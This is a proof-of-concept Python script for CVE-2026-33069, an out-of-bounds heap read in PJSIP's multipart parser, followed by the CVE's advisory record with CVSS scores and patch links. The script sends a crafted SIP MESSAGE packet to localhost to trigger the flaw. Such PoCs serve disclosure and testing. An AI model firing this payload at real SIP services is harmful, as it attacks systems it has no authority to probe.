CVE-2026-33069

import socket # Target configuration TARGET_IP = "127.0.0.1" TARGET_PORT = 5060 # Malformed SIP MESSAGE to trigger OOB read # The boundary string is crafted to be at the edge of the buffer boundary = "unique-boundary-12345" body_content = "Hello World" # Construct the payload # The vulnerability triggers when parsing the multipart body boundary payload = ( f"MESSAGE sip:test@{TARGET_IP} SIP/2.0\r\n" f"Via: SIP/2.0/UDP 192.168.1.100:5060;branch=z9hG4bK-poc\r\n" f"From: <sip:[email protected]>;tag=poc\r\n" f"To: <sip:test@{TARGET_IP}>\r\n" f"Call-ID: poc-call-id\r\n" f"CSeq: 1 MESSAGE\r\n" f"Content-Type: multipart/mixed; boundary={boundary}\r\n" f"Content-Length: {len(body_content) + len(boundary) + 6}\r\n" f"\r\n" f"--{boundary}\r\n" f"Content-Type: text/plain\r\n" f"\r\n" f"{body_content}\r\n" f"--{boundary}" # Truncated ending to potentially hit buffer edge ) # Send the malicious packet try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.sendto(payload.encode('utf-8'), (TARGET_IP, TARGET_PORT)) print(f"[+] PoC packet sent to {TARGET_IP}:{TARGET_PORT}") sock.close() except Exception as e: print(f"[-] Error sending packet: {e}")

{"cve": {"id": "CVE-2026-33069", "sourceIdentifier": "[email protected]", "published": "2026-03-20T09:16:15.183", "lastModified": "2026-03-23T15:32:13.853", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PJSIP is a free and open source multimedia communication library written in C. Versions 2.16 and below have a cascading out-of-bounds heap read in pjsip_multipart_parse(). After boundary string matching, curptr is advanced past the delimiter without verifying it has not reached the buffer end. This allows 1-2 bytes of adjacent heap memory to be read. All applications that process incoming SIP messages with multipart bodies or SDP content are potentially affected. This issue is resolved in version 2.17."}, {"lang": "es", "value": "PJSIP es una biblioteca de comunicación multimedia de código abierto y gratuita escrita en C. Las versiones 2.16 e inferiores tienen una lectura de montículo fuera de límites en cascada en pjsip_multipart_parse(). Después de la coincidencia de la cadena de límite, curptr se avanza más allá del delimitador sin verificar que no ha alcanzado el final del búfer. Esto permite que se lean 1-2 bytes de memoria de montículo adyacente. Todas las aplicaciones que procesan mensajes SIP entrantes con cuerpos multipart o contenido SDP están potencialmente afectadas. Este problema se resuelve en la versión 2.17."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pjsip:pjsip:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.17", "matchCriteriaId": "117AFEC4-36E1-424F-B2A3-6EC94FBBDF38"}]}]}], "references": [{"url": "https://github.com/pjsip/pjproject/commit/f0fa32a226df5f87a9903093e5d145ebb69734db", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/pjsip/pjproject/security/advisories/GHSA-x5pq-qrp4-fmrj", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}